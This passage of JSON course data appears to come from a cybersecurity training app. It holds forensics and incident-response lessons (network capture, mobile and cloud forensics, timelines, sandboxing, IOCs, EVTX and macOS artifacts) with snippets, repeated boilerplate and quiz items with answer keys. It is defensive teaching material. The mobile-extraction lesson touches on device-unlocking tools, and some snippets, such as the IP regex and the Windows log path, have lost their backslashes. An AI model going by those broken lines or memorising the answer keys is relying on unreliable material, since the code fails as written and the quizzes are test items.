blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1}]},{"id":"fo-network-tap","cat":"Forensics & IR","title":"Network Tap vs Span Port","diff":1,"xp":75,"intro":"Two ways to capture network traffic \u2014 each with tradeoffs.","sections":[{"type":"text","content":"A network tap is a physical device that copies all traffic. A SPAN/mirror port copies traffic to a monitoring port. Taps are passive and don't miss packets; SPAN ports can drop packets under load."},{"type":"code","lang":"bash","content":"# SPAN port (switch configuration):\n# monitor session 1 source interface Gi0/1\n# monitor session 1 destination interface Gi0/24\n# Network tap: physical device, no configuration\n# Capture: tcpdump -i monitor_interface -w capture.pcap"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Network taps are preferred over SPAN because...","opts":["They're cheaper","They're passive and don't drop packets under load","They filter traffic","They encrypt captures"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1},{"type":"quiz","q":"Ransomware IR first action?","opts":["Pay","Disconnect (don't power off)","Reinstall","Call police"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1}]},{"id":"fo-mobile-extraction","cat":"Forensics & IR","title":"Mobile Device Forensic Extraction","diff":4,"xp":250,"intro":"Extract data from iOS and Android devices for investigation.","sections":[{"type":"text","content":"Extraction methods: logical (backup files), filesystem (jailbreak/root required), physical (chip-off, JTAG). Each gives different access levels."},{"type":"code","lang":"bash","content":"# Android ADB backup\nadb backup -all -f backup.ab\n# Convert to readable format\ndd if=backup.ab bs=24 skip=1 | python3 -c 'import zlib,sys;sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))' > backup.tar\n# iOS: iTunes/Finder backup + idevicebackup2\n# Physical: Cellebrite UFED, GrayKey"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Filesystem extraction requires...","opts":["Nothing special","Root/jailbreak access on the device","Only a USB cable","Cloud access"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"fo-cloud-forensics","cat":"Forensics & IR","title":"Cloud Environment Forensics","diff":4,"xp":250,"intro":"Investigate incidents in AWS/Azure/GCP using cloud-native artifacts.","sections":[{"type":"text","content":"Cloud forensics uses: API logs (CloudTrail/Activity Log), VPC Flow Logs, instance snapshots, storage access logs, and IAM credential reports."},{"type":"code","lang":"bash","content":"# AWS CloudTrail: who did what\naws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser\n# Snapshot for analysis\naws ec2 create-snapshot --volume-id vol-xxx\n# VPC Flow Logs: network connections\naws logs filter-log-events --log-group vpc-flow-logs"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Cloud forensics replaces disk imaging with...","opts":["Nothing","API logs, snapshots, and flow logs","Memory dumps only","Packet captures only"],"ans":1},{"type":"quiz","q":"Ransomware IR first action?","opts":["Pay","Disconnect (don't power off)","Reinstall","Call police"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1}]},{"id":"fo-artifact-timeline","cat":"Forensics & IR","title":"Building an Artifact-Based Timeline","diff":3,"xp":200,"intro":"Correlate timestamps across multiple artifact types.","sections":[{"type":"text","content":"Combine: file modified times ($MFT), registry last-write times, event log timestamps, prefetch times, and browser history timestamps into one chronological view."},{"type":"code","lang":"bash","content":"# Extract timestamps from multiple sources:\n# 1. MFT: MFTECmd.exe -f $MFT --csv mft_times.csv\n# 2. Registry: RegRipper timestamps\n# 3. Event logs: EvtxECmd.exe -d logs/ --csv evtx_times.csv\n# 4. Prefetch: PECmd.exe -d Prefetch/ --csv pf_times.csv\n# 5. Merge all into one timeline sorted by time"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Multi-artifact timelines are powerful because...","opts":["They're simple","They show the complete sequence of events across all evidence sources","They're automated","They replace memory forensics"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"fo-malware-sandbox","cat":"Forensics & IR","title":"Malware Sandbox Analysis","diff":2,"xp":150,"intro":"Safely execute malware and observe its behavior.","sections":[{"type":"text","content":"Sandboxes run malware in an isolated VM and record: file system changes, registry modifications, network connections, DNS queries, and API calls."},{"type":"code","lang":"bash","content":"# Online sandboxes:\n# any.run (interactive)\n# hybrid-analysis.com (automated)\n# VirusTotal (static + dynamic)\n# Joe Sandbox (detailed)\n# Local: Cuckoo Sandbox\ncuckoo submit malware.exe\ncuckoo report 1"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Sandbox analysis reveals...","opts":["Source code","Runtime behavior: files created, network connections, API calls","The developer's identity","The encryption key"],"ans":1},{"type":"quiz","q":"Ransomware IR first action?","opts":["Pay","Disconnect (don't power off)","Reinstall","Call police"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1}]},{"id":"fo-ioc-creation","cat":"Forensics & IR","title":"Creating Indicators of Compromise","diff":2,"xp":150,"intro":"Transform investigation findings into shareable, actionable IOCs.","sections":[{"type":"text","content":"From an investigation, extract: file hashes (MD5/SHA256), IP addresses, domain names, URLs, email addresses, registry keys, mutexes, and YARA signatures."},{"type":"code","lang":"bash","content":"# Extract IOCs from an investigation:\n# File hashes\nsha256sum malware.exe >> iocs.txt\n# Network IOCs\ngrep -oP 'd+.d+.d+.d+' network_log.txt | sort -u >> iocs.txt\n# Domain IOCs\ntshark -r capture.pcap -Y dns -T fields -e dns.qry.name | sort -u >> iocs.txt\n# Share via STIX/TAXII format"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"IOCs should include...","opts":["Only IP addresses","Hashes, IPs, domains, URLs, registry keys, and behavioral patterns","Only file names","Only email addresses"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"fo-windows-evtx","cat":"Forensics & IR","title":"Windows EVTX Log Parsing","diff":2,"xp":150,"intro":"Parse and analyze Windows event log files offline.","sections":[{"type":"text","content":"EVTX files contain structured XML event data. Parse offline with EvtxECmd, python-evtx, or chainsaw for rapid threat hunting."},{"type":"code","lang":"bash","content":"# EvtxECmd (Eric Zimmerman)\nEvtxECmd.exe -d C:WindowsSystem32winevtLogs --csv output/\n# Chainsaw (rapid threat hunting)\nchainsaw hunt evtx_files/ --rules sigma_rules/\n# python-evtx\npython3 -c 'from Evtx.Evtx import FileHeader; print(\"parsed\")'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Chainsaw is useful because it...","opts":["Creates event logs","Hunts through EVTX files using Sigma rules rapidly","Modifies logs","Encrypts logs"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"fo-mac-forensics","cat":"Forensics & IR","title":"macOS Forensic Artifacts","diff":3,"xp":200,"intro":"Key macOS artifacts: FSEvents, Spotlight, Unified Logs, KnowledgeC.","sections":[{"type":"text","content":"macOS stores: FSEvents (file system journal), Spotlight metadata, Unified Logs (everything), KnowledgeC (app usage tracking), and quarantine events."},{"type":"code","lang":"bash","content":"# Unified Logs (replaces syslog)\nlog show --predicate 'process == \"ssh\"' --last 24h\n# FSEvents\nfseventsd journal in /.fseventsd/\n# Quarantine events (tracks downloaded files)\nsqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'SELECT * FROM LSQuarantineEvent'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"macOS Unified Logs replaced...","opts":["Event Viewer","Traditional syslog with a centralized structured logging system","Registry","Spotlight"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in 